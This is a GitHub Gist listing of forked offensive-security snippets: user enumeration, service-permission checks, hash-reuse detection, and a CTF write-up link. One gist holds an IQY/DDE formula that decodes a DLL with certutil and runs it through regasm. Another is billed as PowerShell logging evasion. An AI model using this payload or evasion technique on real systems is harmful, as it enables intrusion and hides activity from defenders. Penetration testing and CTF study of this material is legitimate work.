The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Bulldog-Vulnhub-NonIntro.html
A fun box from Vulnhub, written by Nick Frichette. You can find it here at https://www.vulnhub.com/entry/bulldog-1,211/
dannymas
dannymas
/ getloggedon.py
Created
September 17, 2018 22:12
— forked from dirkjanm/getloggedon.py
Simple script that uses impacket to enumerate logged on users as admin using NetrWkstaUserEnum and impacket
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Copyright (c) 2012-2018 CORE Security Technologies | |
| # | |
| # This software is provided under under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # Gets logged on users via NetrWkstaUserEnum (requires admin on targets). | |
| # Mostly adapted from netview.py and lookupsid.py | |
| # |
dannymas
/ CTFWRITE-Bulldog@Vulnhub.md
Created
September 17, 2018 02:40
— forked from berzerk0/CTFWRITE-Bulldog@Vulnhub.md
CTF Writeup: Bulldog on VulnHub
dannymas
/ web-servers.md
Created
September 14, 2018 14:50
— forked from willurd/web-servers.md
Big list of http static server one-liners
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
dannymas
/ checksvc.py
Created
September 8, 2018 00:07
— forked from wdormann/checksvc.py
Check for insecure services on Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import subprocess | |
| import ctypes | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG'] | |
| FNULL = open(os.devnull, 'w') |
dannymas
/ remote.iqy
Created
August 4, 2018 04:12
— forked from Mr-Un1k0d3r/remote.iqy
IQY File Remote Payload POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =cmd|' /c more +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
dannymas
/ posh.cs
Created
July 19, 2018 03:39
— forked from benpturner/posh.cs
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Security; | |
| using System.Management.Automation.Runspaces; | |
| using System.Reflection; | |
| namespace TranscriptBypass | |
| { | |
| // Compiling with CSC.exe v4.0.30319 or v3.5 |
dannymas
/ check_hashes.py
Created
July 4, 2018 20:47
— forked from bandrel/check_hashes.py
To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| #Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller | |
| #Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH::: | |
| # ./check_hashes.py <hash_dump> | |
| import sys | |
| hashes = {} | |
| with open(sys.argv[1]) as infile: |
NewerOlder